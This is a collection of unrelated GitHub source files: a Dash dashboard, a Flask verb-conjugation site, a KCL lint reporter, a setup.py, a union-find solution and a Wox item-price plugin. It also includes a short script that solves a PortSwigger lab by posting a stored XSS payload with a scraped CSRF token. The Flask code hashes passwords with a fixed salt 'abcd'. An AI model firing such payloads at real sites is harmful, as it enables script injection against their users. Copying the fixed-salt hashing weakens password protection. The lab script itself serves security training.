{'label': 'show percentage w.r.t. group', 'value': 'True'}],
value=[],
inline=True,
switch=True,
style={
'display': 'inline'
}
)
],
style={
'textAlign': 'center',
'margin-top': '15px'
}
)
]
),
html.Div(
children=[
html.Div(
dcc.Link(
dbc.Button(page['name'].replace('_', ' ')),
href=page["relative_path"],
style={
'margin': '10px',
}
),
style={
'display': 'inline-block'
}
)
for page in dash.page_registry.values() if not page['name'].startswith('Segment')
] + [
dbc.Button(
"Download Raw Data Excel Sheet", id="download_xlsx_btn", style={'margin': '10px'}, color='info'
),
dcc.Download(id="download_xlsx")
],
style={
'text-align': 'center',
'padding-top': '20px',
'padding-bottom': '20px',
}
),
html.Div(
[
html.Div(
dcc.Link(
dbc.Button(page['name'].replace(
'_', ' '), color='danger'),
href=page["relative_path"],
style={
'margin': '10px',
}
),
style={
'display': 'inline-block'
}
)
for page in dash.page_registry.values() if page['name'].startswith('Segment')
],
style={
'text-align': 'center',
'padding-top': '0px',
'padding-bottom': '20px',
}
),
dash.page_container
],
# style={'height': '100vh'}
)
@ app.callback(
Output("download_xlsx", "data"),
Input("download_xlsx_btn", "n_clicks"),
prevent_initial_call=True
)
def down(n_clicks):
return dcc.send_file("./utils/FAI_results.xlsx")
@ app.callback(
Output(component_id='demograph', component_property='options'),
Output(component_id='demograph', component_property='value'),
Input(component_id='gp_method', component_property='value')
)
def update_group_options(method):
if method == "demo":
options = [demo_mapping[-1]] + demo_mapping[0:5]
value = demo_mapping[-1]['value']
return options, value
if method == "fin":
options = [demo_mapping[-1]] + fin_mapping[4:9]
value = demo_mapping[-1]['value']
return options, value
@ app.callback(
Output(component_id='group_options', component_property='children'),
Output(component_id='group_options_traces', component_property='children'),
Output(component_id='gp_title', component_property='style'),
Output(component_id='gp_title_big', component_property='children'),
[
Input(component_id='demograph', component_property='value'),
Input(component_id='gp_method', component_property='value')
]
)
def update_groups(demo, gp_method):
if gp_method == 'demo':
groups = demo_groups
mappings = demo_mapping
gp_title = 'Demographic category to analyze'
elif gp_method == 'fin':
groups = fin_groups
mappings = fin_mapping
gp_title = 'Fintech usage to analyze'
binary_user = dbc.Checklist(
id='bin_fin',
persistence=True,
persistence_type='memory',
options=[
{'label': 'show binary users', 'value': 'False'}],
value=[],
inline=True,
switch=True,
style={
'display': 'none'
}
)
if demo == demo_mapping[-1]['value']:
checkboxes = dbc.Checklist(
id='groups',
persistence=True,
persistence_type='memory',
options=demo_groups[demo][0:1],
style={
'textAlign': 'center',
'display': 'none'
},
value=[bool(demo_groups[demo][0]['value'])],
inline=True
),
return checkboxes, binary_user, {'display': 'none'}, gp_title
checkboxes = dbc.Checklist(
id='groups',
persistence=True,
persistence_type='memory',
options=groups[demo],
style={
'textAlign': 'center',
'display': 'inline'
},
value=[l['value'] for l in groups[demo]],
inline=True
)
if gp_method == 'fin':
binary_user = dbc.Checklist(
id='bin_fin',
persistence=True,
persistence_type='memory',
options=[
{'label': 'show binary users', 'value': 'False'}],
value=[],
inline=True,
switch=True,
style={
'display': 'inline'
}
)
return checkboxes, [l_break, binary_user], {'textAlign': 'center', 'margin-top': '15px'}, gp_title
else:
binary_user = dbc.Checklist(
id='bin_fin',
persistence=True,
persistence_type='memory',
options=[
{'label': 'show binary users', 'value': 'False'}],
value=[],
inline=True,
switch=True,
style={
'display': 'none'
}
)
return checkboxes, [l_break, binary_user], {'textAlign': 'center', 'margin-top': '15px'}, gp_title
if __name__ == '__main__':
app.run_server(host="0.0.0.0", port=8051)
| adrwong/FAI | app.py | app.py | py | 10,096 | python | en | code | 0 | github-code | 36 |
23256745509 | from flask import Flask, render_template, request, session, redirect, flash, url_for
from flask_hashing import Hashing
import random
import secrets
from .utils import *
app = Flask(__name__)
app.config.from_object('config')
hashing = Hashing(app)
def before_request():
"""fonction qui initialise les sessions de flask"""
# models.addReset(0) #Supprimer après execution
# models.reset_xp()
if not ("username" in session):
session["username"] = "Connexion"
if not ('timeSpanish' in session):
session["timeSpanish"] = "temps"
session["pronounsSpanish"] = "pronoms"
session["verbSpanish"] = 'verbe'
if not ("bananeSpanish" in session):
session["bananeSpanish"] = None
session["banane2Spanish"] = None
session["banane3Spanish"] = None
session["banane4Spanish"] = None
session["banane5Spanish"] = None
session["banane6Spanish"] = None
session["banane7Spanish"] = None
session["kiwiSpanish"] = None
session["kiwi2Spanish"] = None
session["kiwi3Spanish"] = None
if not ("erreur_timeSpanish" in session):
session["erreur_timeSpanish"] = []
session["erreur_pronounsSpanish"] = []
session["erreur_verbSpanish"] = []
session["erreur_typeSpanish"] = []
if "erreur_verbSpanish" in session and len(session["erreur_verbSpanish"]) >= 5:
session["erreur_timeSpanish"] = [session["erreur_timeSpanish"][-1]]
session["erreur_pronounsSpanish"] = [session["erreur_pronounsSpanish"][-1]]
session["erreur_verbSpanish"] = [session["erreur_verbSpanish"][-1]]
session["erreur_typeSpanish"] = [session["erreur_typeSpanish"][-1]]
if not ("reponseUserSpanish" in session):
session["reponseUserSpanish"] = ""
if not ("reponseVerbSpanish" in session):
session["reponseVerbSpanish"] = ""
if not ('timeItalian' in session):
session["timeItalian"] = "temps"
session["pronounsItalian"] = "pronoms"
session["verbItalian"] = 'verbe'
if not ("bananeItalian" in session):
session["bananeItalian"] = None
session["banane2Italian"] = None
session["banane3Italian"] = None
session["banane4Italian"] = None
session["banane5Italian"] = None
session["kiwiItalian"] = None
session["kiwi2Italian"] = None
session["kiwi3Italian"] = None
if not ("erreur_timeItalian" in session):
session["erreur_timeItalian"] = []
session["erreur_pronounsItalian"] = []
session["erreur_verbItalian"] = []
session["erreur_typeItalian"] = []
if "erreur_verbItalian" in session and len(session["erreur_verbItalian"]) >= 5:
session["erreur_timeItalian"] = [session["erreur_timeItalian"][-1]]
session["erreur_pronounsItalian"] = [session["erreur_pronounsItalian"][-1]]
session["erreur_verbItalian"] = [session["erreur_verbItalian"][-1]]
session["erreur_typeItalian"] = [session["erreur_typeItalian"][-1]]
if not ("reponseUserItalian" in session):
session["reponseUserItalian"] = ""
if not ("reponseVerbItalian" in session):
session["reponseVerbItalian"] = ""
# Home page
@app.route("/", methods=['GET', 'POST'])
def home():
"""fonction qui renvoie la page d'acceuil du site"""
before_request()
return render_template("home.html",
username=session["username"])
# German page
@app.route("/de", methods=['GET', 'POST'])
def de():
"""fonction qui renvoie la page d'allemand du site"""
before_request()
return render_template("language/german.html",
username=session["username"])
# Italian page
@app.route("/it", methods=['GET', 'POST'])
def it():
"""fonction qui renvoie la page d'italien du site"""
before_request()
rappel = ""
verif = request.form.get("temps[]")
if verif == "futur" or verif == "conditionnel" or verif == "présent" or verif == "imparfait" or verif == "passé simple":
session["listActiveTimesItalian"] = request.form.getlist("temps[]")
session["timeItalian"] = random.choice(session["listActiveTimesItalian"])
session["pronounsItalian"] = random.choice(listPronounsItalian)
bananes = {"futur": "bananeItalian", "conditionnel": "banane2Italian",
"présent": "banane3Italian", "imparfait": "banane4Italian",
"passé simple": "banane5Italian"}
for time in bananes:
if time in session["listActiveTimesItalian"]:
session[bananes[time]] = "checked"
else:
session[bananes[time]] = None
if request.form.get("reponse") is not None and session["verbItalian"] != "verbe":
if request.form.get("reponse") is not None:
reponse = request.form.getlist("reponse")
reponse = reponse[0].lower()
else:
reponse = ""
for chr in reponse:
if chr != " ":
session["reponseVerbItalian"] += chr
if "irregularItalian" in session and session["irregularItalian"] is True:
correction = correspondanceTimeIrregularItalian[session["timeItalian"]]()[
listPronounsItalian.index(session['pronounsItalian'])][
correspondanceVerbItalian.index(session["verbItalian"])]
if session["reponseVerbItalian"] == correction:
session["reponseUserItalian"] = True
models.addPoint(session["username"], 2)
else:
session["reponseUserItalian"] = str(correction)
session["erreur_timeItalian"] += [session["timeItalian"]]
session["erreur_verbItalian"] += [session["verbItalian"]]
session["erreur_pronounsItalian"] += [session["pronounsItalian"]]
session["erreur_typeItalian"] += [True]
if not ("compteurItalian" in session):
session["compteurItalian"] = 0
else:
termination = str(session["verbItalian"][-3:])
if termination == "rre":
correction = \
"c" + correspondanceTimeItalian[session["timeItalian"]]()[
listPronounsItalian.index(session['pronounsItalian'])][1]
else:
correction = \
correspondanceTimeItalian[session["timeItalian"]]()[listPronounsItalian.index(session['pronounsItalian'])][
correspondanceTerminationItalian.index(termination)]
if session["reponseVerbItalian"] == session["verbItalian"][:-3] + correction and session["verbItalian"][-1] != "c":
session["reponseUserItalian"] = True
models.addPoint(session["username"], 1)
elif session["verbItalian"][-1] == "c" and session["reponseVerbItalian"] == session["verbItalian"][:-3] + "h" + correction:
session["reponseUserItalian"] = str(session["verbItalian"][:-3] + "h" + correction)
models.addPoint(session["username"], 1)
elif session["verbItalian"][-1] == "c":
session["reponseUserItalian"] = str(session["verbItalian"][:-3] + "h" + correction)
else:
session["reponseUserItalian"] = str(session["verbItalian"][:-3] + correction)
if session["reponseUserSpanish"] is not True:
session["erreur_timeItalian"] += [session["timeItalian"]]
session["erreur_verbItalian"] += [session["verbItalian"]]
session["erreur_pronounsItalian"] += [session["pronounsItalian"]]
session["erreur_typeItalian"] += [False]
if not ("compteurItalian" in session):
session["compteurItalian"] = 0
verb_type = request.form.get("drone")
if request.form.get("continue") is not None or verb_type is not None:
session["reponseUserItalian"] = ""
session["reponseVerbItalian"] = ""
if verb_type == "tous" or (
verb_type != "reguliers" and verb_type != "irreguliers" and "tousItalian" in session and session[
"tousItalian"] is True):
aleatoire = random.randint(0, 1)
session["kiwi2Italian"] = "checked"
session["kiwi3Italian"] = None
session["kiwiItalian"] = None
if aleatoire == 0:
session["verbItalian"] = csvReaderIrregularItalian.verbChoice()
session["irregularItalian"] = True
session["tousItalian"] = True
else:
session["verbItalian"] = csvReaderItalian.verbChoice()
session["tousItalian"] = True
session["irregularItalian"] = False
elif verb_type == "irreguliers" or (
verb_type != "reguliers" and "irregularItalian" in session and session["irregularItalian"] is True):
session["kiwi3Italian"] = "checked"
session["kiwiItalian"] = None
session["kiwi2Italian"] = None
session["verbItalian"] = csvReaderIrregularItalian.verbChoice()
session["irregularItalian"] = True
session["tousItalian"] = False
else:
session["kiwiItalian"] = "checked"
session["kiwi2Italian"] = None
session["kiwi3Italian"] = None
session["verbItalian"] = csvReaderItalian.verbChoice()
session["tousItalian"] = False
session["irregularItalian"] = False
if "compteurItalian" in session and session["compteurItalian"] == 2:
session["timeItalian"] = session["erreur_timeItalian"][0]
session["pronounsItalian"] = session["erreur_pronounsItalian"][0]
session["verbItalian"] = session["erreur_verbItalian"][0]
session["irregularItalian"] = session["erreur_typeItalian"][0]
session["erreur_timeItalian"].pop(0)
session["erreur_pronounsItalian"].pop(0)
session["erreur_verbItalian"].pop(0)
session["erreur_typeItalian"].pop(0)
session.pop("compteurItalian")
rappel = "Tu as fait une erreur récemment sur ce verbe, conjugue le à nouveau !"
else:
session["timeItalian"] = random.choice(session["listActiveTimesItalian"])
session["pronounsItalian"] = random.choice(listPronounsItalian)
if "compteurItalian" in session:
session["compteurItalian"] += 1
return render_template("language/italian.html",
time=session["timeItalian"],
pronouns=session["pronounsItalian"],
verb=session["verbItalian"],
reponseUser=session["reponseUserItalian"],
reponseVerb=session["reponseVerbItalian"],
banane=session["bananeItalian"],
banane2=session["banane2Italian"],
banane3=session["banane3Italian"],
banane4=session["banane4Italian"],
banane5=session["banane5Italian"],
kiwi=session["kiwiItalian"],
kiwi2=session["kiwi2Italian"],
kiwi3=session["kiwi3Italian"],
username=session["username"],
rappel=rappel)
# Spanish page
@app.route("/es", methods=['GET', 'POST'])
def es():
"""fonction qui traite plusieurs chose:
-renvoie la page d'espagnol du site
-les temps et types de verbes chosie par l'utilisateur(qui viennent d'un formulaire du html): renvoie la page d'espagnol
du site avec des verbes du bon type (réguliers, irréguliers, tous) à conjuguer avec un pronom personnel et le temps auquel le conjugué.
-la réponse de l'utilisateur avec un verbe conjuguer: si il est juste renvoie que la page d'espagnol du site avec écrit
que c'est une bonne réponse sinon renvoie la correction
renvoie aussi un verbe ou l'utilisateur c'est déjà trompé(système de rappel d'erreur) 3 verbes après que l'utilisateur se soient trompé"""
before_request()
rappel = ""
verif = request.form.get("temps[]")
if verif == "Futuro" or verif == "Conditional" or verif == "Presente de indicativo" or verif == "Presente de subjonctivo" or verif == "Pretérito imperfecto de indicativo" or verif == "Pretérito indefinido" or verif == "Prétero imperfecto de subjonctivo":
session["listActiveTimesSpanish"] = request.form.getlist("temps[]")
session["timeSpanish"] = random.choice(session["listActiveTimesSpanish"])
session["pronounsSpanish"] = random.choice(listPronounsSpanish)
bananes = {"Futuro": "bananeSpanish", "Conditional": "banane2Spanish", "Presente de indicativo": "banane3Spanish",
"Presente de subjonctivo": "banane4Spanish", "Pretérito imperfecto de indicativo": "banane5Spanish",
"Pretérito indefinido": "banane6Spanish", "Prétero imperfecto de subjonctivo": "banane7Spanish"}
for time in bananes:
if time in session["listActiveTimesSpanish"]:
session[bananes[time]] = "checked"
else:
session[bananes[time]] = None
if request.form.get("reponse") is not None and session["verbSpanish"] != "verbe":
if request.form.get("reponse") is not None:
reponse = request.form.getlist("reponse")
reponse = reponse[0].lower()
else:
reponse = ""
for chr in reponse:
if chr != " ":
session["reponseVerbSpanish"] += chr
if "irregularSpanish" in session and session["irregularSpanish"] is True:
correction = correspondanceTimeIrregularSpanish[session["timeSpanish"]]()[listPronounsSpanish.index(session['pronounsSpanish'])][
correspondanceVerbSpanish.index(session["verbSpanish"])]
if session["reponseVerbSpanish"] == correction:
session["reponseUserSpanish"] = True
models.addPoint(session["username"], 2)
else:
session["reponseUserSpanish"] = str(correction)
session["erreur_timeSpanish"] += [session["timeSpanish"]]
session["erreur_verbSpanish"] += [session["verbSpanish"]]
session["erreur_pronounsSpanish"] += [session["pronounsSpanish"]]
session["erreur_typeSpanish"] += [True]
if not ("compteurSpanish" in session):
session["compteurSpanish"] = 0
else:
termination = str(session["verbSpanish"][-2:])
correction = correspondanceTimeSpanish[session["timeSpanish"]]()[listPronounsSpanish.index(session['pronounsSpanish'])][
correspondanceTerminationSpanish.index(termination)]
if (session["reponseVerbSpanish"] == session["verbSpanish"][:-2] + correction and session["timeSpanish"] != "Futuro" and session[
"timeSpanish"] != "Conditional") or (
(session["timeSpanish"] == "Futuro" or session["timeSpanish"] == "Conditional") and session["reponseVerbSpanish"] ==
session[
"verbSpanish"] + correction):
session["reponseUserSpanish"] = True
models.addPoint(session["username"], 1)
elif (session["timeSpanish"] == "Futuro" or session["timeSpanish"] == "Conditional") and session["reponseVerbSpanish"] != \
session[
"verbSpanish"] + correction:
session["reponseUserSpanish"] = str(session["verbSpanish"] + correction)
else:
session["reponseUserSpanish"] = str(session["verbSpanish"][:-2] + correction)
if session["reponseUserSpanish"] is not True:
session["erreur_timeSpanish"] += [session["timeSpanish"]]
session["erreur_verbSpanish"] += [session["verbSpanish"]]
session["erreur_pronounsSpanish"] += [session["pronounsSpanish"]]
session["erreur_typeSpanish"] += [False]
if not ("compteurSpanish" in session):
session["compteurSpanish"] = 0
verb_type = request.form.get("drone")
if request.form.get("continue") is not None or verb_type is not None:
session["reponseUserSpanish"] = ""
session["reponseVerbSpanish"] = ""
if verb_type == "tous" or (
verb_type != "reguliers" and verb_type != "irreguliers" and "tousSpanish" in session and session[
"tousSpanish"] is True):
aleatoire = random.randint(0, 1)
session["kiwi2Spanish"] = "checked"
session["kiwi3Spanish"] = None
session["kiwiSpanish"] = None
if aleatoire == 0:
session["verbSpanish"] = csvReaderIrregularSpanish.verbChoice()
session["irregularSpanish"] = True
session["tousSpanish"] = True
else:
session["verbSpanish"] = csvReaderSpanish.verbChoice()
session["tousSpanish"] = True
session["irregularSpanish"] = False
elif verb_type == "irreguliers" or (
verb_type != "reguliers" and "irregularSpanish" in session and session["irregularSpanish"] is True):
session["kiwi3Spanish"] = "checked"
session["kiwiSpanish"] = None
session["kiwi2Spanish"] = None
session["verbSpanish"] = csvReaderIrregularSpanish.verbChoice()
session["irregularSpanish"] = True
session["tousSpanish"] = False
else:
session["kiwiSpanish"] = "checked"
session["kiwi2Spanish"] = None
session["kiwi3Spanish"] = None
session["verbSpanish"] = csvReaderSpanish.verbChoice()
session["tousSpanish"] = False
session["irregularSpanish"] = False
if "compteurSpanish" in session and session["compteurSpanish"] == 2:
session["timeSpanish"] = session["erreur_timeSpanish"][0]
session["pronounsSpanish"] = session["erreur_pronounsSpanish"][0]
session["verbSpanish"] = session["erreur_verbSpanish"][0]
session["irregularSpanish"] = session["erreur_typeSpanish"][0]
session["erreur_timeSpanish"].pop(0)
session["erreur_pronounsSpanish"].pop(0)
session["erreur_verbSpanish"].pop(0)
session["erreur_typeSpanish"].pop(0)
session.pop("compteurSpanish")
rappel = "Tu as fait une erreur récemment sur ce verbe, conjugue le à nouveau !"
else:
session["timeSpanish"] = random.choice(session["listActiveTimesSpanish"])
session["pronounsSpanish"] = random.choice(listPronounsSpanish)
if "compteurSpanish" in session:
session["compteurSpanish"] += 1
return render_template("language/spanish.html",
time=session["timeSpanish"],
pronouns=session["pronounsSpanish"],
verb=session["verbSpanish"],
reponseUser=session["reponseUserSpanish"],
reponseVerb=session["reponseVerbSpanish"],
banane=session["bananeSpanish"],
banane2=session["banane2Spanish"],
banane3=session["banane3Spanish"],
banane4=session["banane4Spanish"],
banane5=session["banane5Spanish"],
banane6=session["banane6Spanish"],
banane7=session["banane7Spanish"],
kiwi=session["kiwiSpanish"],
kiwi2=session["kiwi2Spanish"],
kiwi3=session["kiwi3Spanish"],
username=session["username"],
rappel=rappel)
@app.route("/connexion", methods=['GET', 'POST'])
def connexion():
"""fonction qui renvoie la page de connexion et de création de compte du site"""
before_request()
return render_template("login.html",
username=session["username"])
@app.route("/signup", methods=['GET', 'POST'])
def signup():
"""fonction qui traite la création de compte en vérifiant un compte avec cette adresse email n'existe pas déjà:
si existe renvoie à la page de connexion sinon envoie a la page d'acceuil du site"""
before_request()
user = models.User.query.all()
email = request.form.get("email")
usernameBase = request.form.get("username").lower()
username = ""
for chr in usernameBase:
if chr != " " and (
ord(chr) == 45 or ord(chr) == 46 or 48 <= ord(chr) <= 57 or ord(chr) == 95 or 97 <= ord(chr) <= 122):
username += chr
for val in user:
if email == val.email:
flash("Adresse email déjà utilisé")
return redirect(url_for("connexion"))
if username == val.username:
flash("Nom d'utilisateur déjà utilisé")
return redirect(url_for("connexion"))
firstname = request.form.get("firstname")
lastname = request.form.get("lastname")
mailtoken = secrets.token_hex(12)
mail(email,"mailverif.html", firstname, lastname, username, mailtoken)
password = hashing.hash_value(request.form.get("password"), salt='abcd')
etablissement = request.form.get("etablissement")
date_creation = models.datetime.now().strftime('%d/%m/%Y')
logo = "https://cdn.discordapp.com/attachments/1098726716798673016/1099109424590757929/mexicain.png"
models.addUser(email, False, mailtoken, firstname, lastname, username, password, etablissement, 0, "0", date_creation, logo, 1, 0, 0, 0)
session["username"] = username
flash("Bienvenue et bonne conjugaison")
if "qcm" in session:
return redirect("qcm")
return redirect(url_for("home"))
@app.route("/signin", methods=['GET', 'POST'])
def signin():
"""fonction qui traite la connexion à un compte existant: si il existe l'envoie vers la page d'acceuil connecter
sinon le renvoie à la page de connexion"""
before_request()
user = models.User.query.all()
for val in user:
if request.form.get("email") == val.email and hashing.check_value(val.password, request.form.get("password"),
salt='abcd'):
flash("Connexion réussi")
session["username"] = val.username
if "qcm" in session:
return redirect("qcm")
return redirect(url_for("home"))
elif request.form.get("email") == val.email:
flash("Mot de passe incorrect")
return redirect(url_for("connexion"))
flash("Pas de compte utilisateur pour cette adresse email")
return redirect(url_for("connexion"))
@app.route("/logout", methods=['GET', 'POST'])
def logout():
"""fonction permettant de ce déconnecter de son compte """
before_request()
session["username"] = "Connexion"
flash("Déconnection réussi")
return redirect(url_for("home"))
@app.route("/profile/<username>", methods=['GET', 'POST'])
def username_route(username):
"""fonction qui renvoie la page de profil de l'utilisateur rechercher"""
before_request()
models.modifyClassement(classements())
user = models.User.query.all()
for val in user:
if val.username == username:
date_creation = val.date_creation
xp = val.xp
etablissement = val.etablissement
level = val.level
day_streak = val.day_streak
logo = val.logo
classement = val.classement
return render_template("heritage_template/profile.html",
date_creation=date_creation,
xp=xp,
etablissement=etablissement,
day_streak=day_streak,
logo=logo,
username2=username,
level=level,
classement=classement,
classementJoueurs=classements(),
username=session["username"])
return "User Not Found"
@app.route("/share", methods=['GET', 'POST'])
def partager():
"""fonction qui permet de copié le l'url de la page et de partager sont profil"""
flash("Le lien du profil a bien été copié")
return redirect(url_for("username_route", username=session["username"]))
@app.route("/search", methods=['GET', 'POST'])
def search():
"""fonction qui renvoie la page de recherche du site"""
before_request()
return render_template("search.html", username=session["username"], utilisateurs=utilisateurs())
@app.route("/leaderboard", methods=['GET', 'POST'])
def leaderboard():
"""fonction qui renvoie la page de classement du site"""
before_request()
return render_template("leaderboard.html",
username=session["username"],
utilisateurs=utilisateurs(),
classementPlayers=classements(),
classementWeek=classement_week(),
classementMonth=classement_month())
@app.route("/verif/<username>/<mailtoken>", methods=['GET', 'POST'])
def verif(mailtoken, username):
if models.verif(mailtoken, username) is True:
flash("Compte vérifier")
return redirect(url_for("home"))
flash("une erreur est survenu")
return redirect(url_for("home"))
@app.route("/forgetpassword/<username>/<mailtoken>", methods=['GET', 'POST'])
def passwordForget(username, mailtoken):
password = request.form.get("password")
if password is not None:
password = hashing.hash_value(password, salt='abcd')
if models.changePassword(mailtoken, username, password) is True:
flash("Changement de mot de passe effectué")
return redirect(url_for("home"))
flash("une erreur est survenu")
return redirect(url_for("home"))
return render_template("forgetPassword.html")
@app.route("/forgetpassword", methods=['GET', 'POST'])
def sendMailPassword():
username = session["username"]
mailtoken = secrets.token_hex(12)
fistLastName = addtoken(mailtoken, username)
firstname = fistLastName[0]
lastname = fistLastName[1]
mail = fistLastName[2]
sendmail(mail, "mailforgetpassword.html", firstname, lastname, username, mailtoken)
#@app.route("/qcm", methods=['GET', 'POST'])
#def qcm():
# """fonction permettant d'accéder à la page QCM """
# before_request()
# session["qcm"] = "ok"
# return render_template("qcm.html",
# username=session["username"])
#@app.route("/esQcmChap4", methods=['GET', 'POST'])
#def esQcmChap4():
# before_request()
# if session["username"] == "Connexion":
# return redirect(url_for("qcm"))
# else:
# return render_template("esQcmChap4.html",
# username=session["username"])
| Tezay/conjug | conjugFR/views.py | views.py | py | 27,625 | python | en | code | 6 | github-code | 36 |
1938554685 | import sys
from typing import List
from kclvm.tools.lint.reporters.base_reporter import BaseReporter
from kclvm.tools.lint.message.message import Message
class FileReporter(BaseReporter):
def __init__(self, linter, output=None, encoding=None):
self.name = "file_reporter"
self.output_file = linter.config.output_path
super().__init__(linter, output, encoding)
def print_msg(self, msgs: List[Message] = None):
assert self.output_file
with open(self.output_file, "w") as f:
current = sys.stdout
sys.stdout = f
for msg in msgs:
print(msg)
print()
print("Check total {} files:".format(len(self.linter.file_list)))
for k, v in self.linter.msgs_map.items():
print("{:<8}{}: {}".format(v, k, self.linter.MSGS[k][1]))
print(f"KCL Lint: {len(self.linter.msgs)} problems")
sys.stdout = current
| kcl-lang/kcl-py | kclvm/tools/lint/reporters/file_reporter.py | file_reporter.py | py | 968 | python | en | code | 8 | github-code | 36 |
264212609 | """
https://portswigger.net/web-security/cross-site-scripting/contexts/lab-onclick-event-angle-brackets-double-quotes-html-encoded-single-quotes-backslash-escaped
"""
import sys
import requests
from bs4 import BeautifulSoup
site = sys.argv[1]
if 'https://' in site:
site = site.rstrip('/').lstrip('https://')
s = requests.Session()
def try_post(name, website_link):
blog_post_url = f'https://{site}/post?postId=1'
resp = s.get(blog_post_url)
soup = BeautifulSoup(resp.text,'html.parser')
csrf = soup.find('input', {'name':'csrf'}).get('value')
comment_url = f'https://{site}/post/comment'
comment_data = {
'csrf' : csrf,
'postId' : '1',
'comment' : 'Hello world!',
'name' : name,
'email' : 'baa@pdx.edu',
'website': website_link
}
resp = s.post(comment_url, data=comment_data)
#try_post("single quote","https://pdx.edu/'")
#try_post("double quote",'https://pdx.edu/"')
#try_post("double quote HTML encoded",'https://pdx.edu/"')
#try_post("single quote HTML encoded",'https://pdx.edu/'')
try_post("exploit",'https://pdx.edu/' -alert(1)-'') | brandonaltermatt/penetration-testing-scripts | cross-site-scripting/contexts/onclick-event-angle-brackets-double-quotes-html-encoded-single-quotes-backslash-escaped.py | onclick-event-angle-brackets-double-quotes-html-encoded-single-quotes-backslash-escaped.py | py | 1,149 | python | en | code | 0 | github-code | 36 |
71205780264 | from setuptools import setup, find_packages
from apache_spark import __version__
tests_require = [
'mock',
'nose',
'coverage',
'yanc',
'preggy',
'tox',
'ipdb',
'coveralls',
'sphinx',
]
setup(
name='apache_spark',
version=__version__,
description='Computational tools for Big Data (02807) - Apache Spark',
long_description='''
Computational tools for Big Data (02807) - Apache Spark
''',
keywords='spark pyspark euler graphs',
author='Jose L. Bellod Cisneros & Kosai Al-Nakeeb',
author_email='bellod.cisneros@gmail.com & kosai@cbs.dtu.dk',
url='https://github.com/josl/ApacheSpark_02817',
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: Unix',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: PyPy',
'Operating System :: OS Independent',
],
packages=find_packages(),
include_package_data=False,
install_requires=[
# add your dependencies here
# remember to use 'package-name>=x.y.z,<x.y+1.0' notation (this way you
# get bugfixes)
],
extras_require={
'tests': tests_require,
},
entry_points={
'console_scripts': [
# add cli scripts here in this form:
# 'apache_spark=apache_spark.cli:main',
],
},
)
| yosoyubik/ApacheSpark_02817 | setup.py | setup.py | py | 1,598 | python | en | code | 0 | github-code | 36 |
14248737193 | # 특정 원소가 속한 집합을 찾기
def find_parent(parent, x):
if parent[x] != x:
parent[x] = find_parent(parent, parent[x])
return parent[x]
return parent[x]
def union_parent(parent, a, b):
a = find_parent(parent, a)
b = find_parent(parent, b)
if a < b:
parent[b] = a
else:
parent[a] = b
if __name__ == "__main__":
n = int(input())
parent = [0] * (n + 1) #부모 테이블 초기화
#모든 간선을 담을 리스트와 최종 비용을 담을 변수
edges = []
result = 0
x = []
y = []
z = []
#부모 테이블상에서, 부모를 자기 자신으로 초기화
for i in range(1, n + 1):
parent[i] = i
# 모든 노드에 대한 좌표 값 입력받기
for i in range(1, n + 1):
data = list(map(int, input().split()))
x.append((data[0], i)) # x좌표값만 추가 -> i는 노드번호
y.append((data[1], i)) # y좌표값만 추가
z.append((data[2], i)) # z좌표값만 추가
# 오름차순 정렬
x.sort()
y.sort()
z.sort()
for i in range(n - 1):
# 비용순으로 정렬 위해서 첫 번째 원소를 비용으로 지정
edges.append((x[i + 1][0] - x[i][0], x[i][1], x[i + 1][1]))
edges.append((y[i + 1][0] - y[i][0], y[i][1], y[i + 1][1]))
edges.append((z[i + 1][0] - z[i][0], z[i][1], z[i + 1][1]))
# 여기서부터 코드를 수정해나가기
edges.sort()
for edge in edges:
cost, a, b = edge
if find_parent(parent, a) != find_parent(parent, b):
union_parent(parent, a, b)
result += cost
print(result)
| vmfaldwntjd/Algorithm | BaekjoonAlgorithm/파이썬/그래프/[백준 2887]행성 터널/Baekjoon_2887.py | Baekjoon_2887.py | py | 1,709 | python | ko | code | 0 | github-code | 36 |
18262811618 | import requests
import json
import os
import pyperclip
from wox import Wox,WoxAPI
class Main(Wox):
def query(self,key):
results=[]
key=key.split(' ')
servers={
'1':"LuXingNiao",'2':"MoGuLi",'3':"MaoXiaoPang",
}
worlds={
'HongYuHai':"红玉海",
'LaNuoXiYa':"拉诺西亚",
'ChenXiWangZuo':"晨曦王座",
'YuZhouHeYin':"宇宙和音",
'WoXianXiRan':"沃仙曦染",
'ShenYiZhiDi':"神意之地",
'HuanYingQunDao':"幻影群岛",
'MengYaChi':"萌芽池",
'BaiYinXiang':"白银乡",
'BaiJinHuanXiang':"白金幻象",
'ShenQuanHen':"神拳痕",
'ChaoFengTing':"潮风亭",
'LvRenZhanQiao':"旅人栈桥",
'FuXiaoZhiJian':"拂晓之间",
'Longchaoshendian':"龙巢神殿",
'MengYuBaoJing':"梦羽宝境",
'ZiShuiZhanQiao':"紫水栈桥",
'YanXia':"延夏",
'JingYuZhuangYuan':"静语庄园",
'MoDuNa':"摩杜纳",
'HaiMaoChaWu':"海猫茶屋",
'RouFengHaiWan':"柔风海湾",
'HuPoYuan':"琥珀原"
}
if key[0]=='s':
recvListings=self.cafemaker(key[1])
for item in recvListings:
itemID,itemType,itemIconPath,itemKindName,itemName=self.itemSolve(item)
if itemType=="Item":
itemIconUrl='https://cafemaker.wakingsands.com/{}'.format(itemIconPath)
if not os.path.exists('ItemIcon/{}.png'.format(itemID)):
with open('ItemIcon/{}.png'.format(itemID),'wb') as f:
f.write(requests.get(itemIconUrl).content)
results.append({
"Title":"{}".format(itemName),
"SubTitle":"{}".format(itemKindName),
"IcoPath":"ItemIcon/{}.png".format(itemID),
"JsonRPCAction":{
"method":"Wox.ChangeQuery",
"parameters":["item q {} 1 ({})".format(itemID,itemName),False],
"dontHideAfterAction":True
}
})
return results
if key[0]=='q':
data=self.universalis(servers[key[2]],key[1])
for item in data:
results.append({
"Title": "{} x {} = {}".format(item["pricePerUnit"],item["quantity"],item["total"]),
"SubTitle": "{}({})".format(item["retainerName"],worlds[item["worldName"]]),
"IcoPath":"Images/hq.png"if item["hq"] else "Images/nq.png"
})
return results
def universalis(self,server,itemID):
api='https://universalis.app/api/{}/{}'.format(server,itemID)
recv=requests.get(api)
if recv.text=='Not Found':
return False
return json.loads(recv.text)["listings"]
def cafemaker(self,queryName):
u='https://cafemaker.wakingsands.com/search?columns=ID%2CUrlType%2CIcon%2CName%2CItemKind.Name&string={}'.format(queryName)
return json.loads(requests.get(u).text)["Results"]
